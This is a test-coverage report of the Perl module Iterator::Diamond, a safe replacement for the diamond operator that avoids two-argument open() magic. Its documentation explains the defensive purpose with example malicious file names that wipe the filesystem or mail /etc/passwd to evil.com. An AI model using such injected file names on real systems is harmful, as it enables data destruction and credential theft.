File Coverage

blib/lib/Iterator/Diamond.pm
Criterion Covered Total %
statement 35 35 100.0
branch 7 8 87.5
condition 8 12 66.6
subroutine 9 9 100.0
pod 1 2 50.0
total 60 66 90.9


line stmt bran cond sub pod time code
1             #! perl
2              
3             package Iterator::Diamond;
4              
5 9     9   230011 use warnings;
  9         27  
  9         368  
6 9     9   48 use strict;
  9         20  
  9         309  
7 9     9   54 use Carp;
  9         18  
  9         983  
8 9     9   93 use base qw(Iterator::Files);
  9         29  
  9         7943  
9              
10             =head1 NAME
11              
12             Iterator::Diamond - Iterate through the files from ARGV
13              
14             =cut
15              
16             our $VERSION = '0.04';
17             $VERSION =~ tr/_//d;
18              
19             =head1 SYNOPSIS
20              
21             use Iterator::Diamond;
22              
23             $input = Iterator::Diamond->new;
24             while ( <$input> ) {
25             ...
26             warn("Current file is $ARGV\n");
27             }
28              
29             # Alternatively:
30             while ( $input->has_next ) {
31             $line = $input->next;
32             ...
33             }
34              
35             =head1 DESCRIPTION
36              
37             Iterator::Diamond provides a safe and customizable replacement for the
38             C<< <> >> (Diamond) operator.
39              
40             Just like C<< <> >> it returns the records of all files specified in
41             C<@ARGV>, one by one, as if it were one big happy file. In-place
42             editing of files is also supported. It does use C<@ARGV>, C<$ARGV> and
43             C as documented in L, though without magic.
44              
45             As opposed to the built-in C<< <> >> operator, no magic is applied to
46             the file names unless explicitly requested. This means that you're
47             protected from file names that may wreak havoc to your system when
48             processed through the magic of the two-argument open() that Perl
49             normally uses for C<< <> >>.
50              
51             Iterator::Diamond is based on L.
52              
53             =head1 RATIONALE
54              
55             Perl has two forms of open(), one with 2 arguments and one with 3 (or
56             more) arguments.
57              
58             The 2-argument open is magical. It opens a file for reading or writing
59             according to a leading '<' or '>', strips leading and trailing
60             whitespace, starts programs and reads their output, or writes to their
61             input. A filename '-' is taken to be the standard input or output of
62             the program, depending on whether the file is opened for reading or
63             writing.
64              
65             The 3-argument open is strict. The second argument designates the way
66             the file should be opened, and the third argument contains the file
67             name, taken literally.
68              
69             Many programs read a series of files whose names are passed as command
70             line argument. The diamond operator makes this very easy:
71              
72             while ( <> ) {
73             ....
74             }
75              
76             The program can then be run as something like
77              
78             myprog *.txt
79              
80             Internally, Perl uses the 2-argument open for this.
81              
82             What's wrong with that?
83              
84             Well, this goes horribly wrong if you have file names that trigger the
85             magic of Perl's 2-argument open.
86              
87             For example, if you have a file named ' foo.txt' (note the leading
88             space), running
89              
90             myprog *.txt
91              
92             will surprise you with the error message
93              
94             Can't open foo.txt: No such file or directory
95              
96             This is still reasonably harmless. But what if you have a file
97             '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're
98             lucky, that is. It can also silently wipe out valuable data.
99              
100             When your system administrator runs scripts like this, malicous file
101             names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can
102             be a severe threat to your system.
103              
104             After a long discussion on the perl mailing list it was felt that this
105             security hole should be fixed. Iterator::Diamond does this by
106             providing a decent iterator that behaves just like C<< <> >>, but with
107             safe semantics.
108              
109             =head1 FUNCTIONS
110              
111             =head2 new
112              
113             Constructor. Creates a new iterator.
114              
115             The iterator can be used by calling its methods, but it can also be
116             used as argument to the readline operator. See the examples in
117             L.
118              
119             B takes an optional series of key/value pairs to control the
120             exact way the iterator must behave.
121              
122             =over 4
123              
124             =item B<< magic => >> { none | stdin | all }
125              
126             C applies three-argument open semantics to all file names and do
127             not use any magic. This is the default behaviour.
128              
129             C is also safe. It applies three-argument open semantics but
130             allows a file name consisting of a single dash C<< - >> to mean the
131             standard input of the program. This is often very convenient.
132              
133             C applies two-argument open semantics. This makes the iteration
134             unsafe again, just like the built-in C<< <> >> operator.
135              
136             =item B<< edit => >> I
137              
138             Enables in-place editing of files, just as the built-in C<< <> >> operator.
139              
140             Unlike the built-in operator semantics, an empty suffix to discard backup
141             files is not supported.
142              
143             =item B<< use_i_option >> I
144              
145             If set to true, and if B is not specified, the perl command line
146             option C<-i>I will be used to enable or disable in-place editing.
147             By default, perl command line options are ignored.
148              
149             =item B<< files => >> I
150              
151             Use this list of files instead of @ARGV.
152              
153             If C are not specified and C or C magic is in effect,
154             an empty @ARGV will be treated as a list containing a single dash C<< - >>.
155              
156             =back
157              
158             =cut
159              
160             sub new {
161 13     13 1 15475 my ($pkg, %args) = @_;
162 13         81 my $use_i_option = delete $args{use_i_option};
163 13 50 66     137 if ($use_i_option && !exists($args{edit}) && defined $^I) {
      66        
164 2         7 $args{edit} = $^I;
165             }
166 13         252 my $self = $pkg->SUPER::new( files => \@ARGV, %args );
167 12 100 66     145 if ( !exists($args{files}) && !@ARGV && $self->_magic_stdin ) {
      66        
168 1         4 @ARGV = qw(-);
169             }
170 12         30 $self->{_current_file} = \$ARGV;
171 12         127 return $self;
172             }
173              
174             =head2 next
175              
176             Method, no arguments.
177              
178             Returns the next record of the input stream, or undef if the stream is
179             exhausted.
180              
181             =cut
182              
183             sub readline {
184 48     48 0 686 shift->SUPER::readline;
185             }
186              
187             #### WARNING ####
188             # From overload.pm: Even in list context, the iterator is currently
189             # called only once and with scalar context.
190 9     9   138 use overload '<>' => \&readline;
  9         20  
  9         49  
191              
192             sub _advance {
193 27     27   40 my $self = shift;
194 27         121 my $res = $self->SUPER::_advance;
195 27 100       163 return unless $res;
196 14         292 open(ARGV, '<&=', fileno($self->{_current_fh}));
197 14 100       45 if ( $self->{_edit} ) {
198 9     9   887 no warnings 'once';
  9         18  
  9         1293  
199 2         30 open(ARGVOUT, '>&=', fileno($self->{_rewrite_fh}));
200             }
201 14         65 return $res;
202             }
203              
204             =head2 has_next
205              
206             Method, no arguments.
207              
208             Returns true if the stream is not exhausted. A subsequent call to
209             C will return a defined value.
210              
211             This is the equivalent of the 'eof()' function.
212              
213             =cut
214              
215             =head2 is_eof
216              
217             Method, no arguments.
218              
219             Returns true if the current file is exhausted. A subsequent call to
220             C will open the next file if available and start reading it.
221              
222             This is the equivalent of the 'eof' function.
223              
224             =cut
225              
226             =head2 current_file
227              
228             Method, no arguments.
229              
230             Returns the name of the current file being processed.
231              
232             =cut
233              
234             =head1 GLOBAL VARIABLES
235              
236             Since Iterator::Diamond is a plug-in replacement for the built-in C<<
237             <> >> operator, it uses the same global variables as C<< <> >> for the
238             same purposes.
239              
240             =over 4
241              
242             =item @ARGV
243              
244             The list of file names to be processed. When a new file is opened, its
245             name is removed from the list.
246              
247             =item $ARGV
248              
249             The name of the file currently being processed. This can also be
250             obtained by using the iterators C method.
251              
252             =item $^I
253              
254             Enables in-place editing and, optionally, designates the backup suffix
255             for edited files. See L for details.
256              
257             Setting C<$^I> to I has the same effect as using the Perl
258             command line argument C<-I>I or using the CI
259             option to the iterator constructor.
260              
261             =item ARGVOUT
262              
263             When in-place editing, this file handle is used to open the new,
264             possibly modified, file to be written. This file handle is select()ed
265             for standard output.
266              
267             =back
268              
269             =head1 LIMITATIONS
270              
271             Perl's internal ARGV processing is very magical, and cannot be
272             completely implemented in plain perl. However, the discrepancies
273             should not be noticeable in normal situations.
274              
275             Even in list context, the iterator C<< <$input> >> is currently called
276             only once and with scalar context. This will not work as expected:
277              
278             my @lines = <$input>;
279              
280             This reads all remaining lines:
281              
282             my @lines = $input->readline;
283              
284             =head1 SEE ALSO
285              
286             L, open() in L, L.
287              
288             =head1 AUTHOR
289              
290             Johan Vromans, C<< >>
291              
292             =head1 BUGS
293              
294             Please report any bugs or feature requests to C
295             at rt.cpan.org>, or through the web interface at
296             L. I
297             will be notified, and then you'll automatically be notified of
298             progress on your bug as I make changes.
299              
300             =head1 SUPPORT
301              
302             You can find documentation for this module with the perldoc command.
303              
304             perldoc Iterator::Diamond
305              
306             You can also look for information at:
307              
308             =over 4
309              
310             =item * RT: CPAN's request tracker
311              
312             L
313              
314             =item * CPAN Ratings
315              
316             L
317              
318             =item * Search CPAN
319              
320             L
321              
322             =back
323              
324             =head1 ACKNOWLEDGEMENTS
325              
326             This package was inspired by a most interesting discussion of the
327             perl5-porters mailing list, July 2008, on the topic of the unsafeness
328             of two-argument open() and its use in the C<< <> >> operator.
329              
330             =head1 COPYRIGHT & LICENSE
331              
332             Copyright 2008 Johan Vromans, all rights reserved.
333              
334             This program is free software; you can redistribute it and/or modify it
335             under the same terms as Perl itself.
336              
337             =cut
338              
339             =begin maybe_later
340              
341             sub TIEHANDLE {
342             goto &new;
343             }
344              
345             sub READLINE {
346             goto &readline;
347             }
348              
349             tie *::ARGV, 'Iterator::Diamond';
350              
351             =end maybe_later
352              
353             =cut
354              
355             1; # End of Iterator::Diamond
356              
357             __END__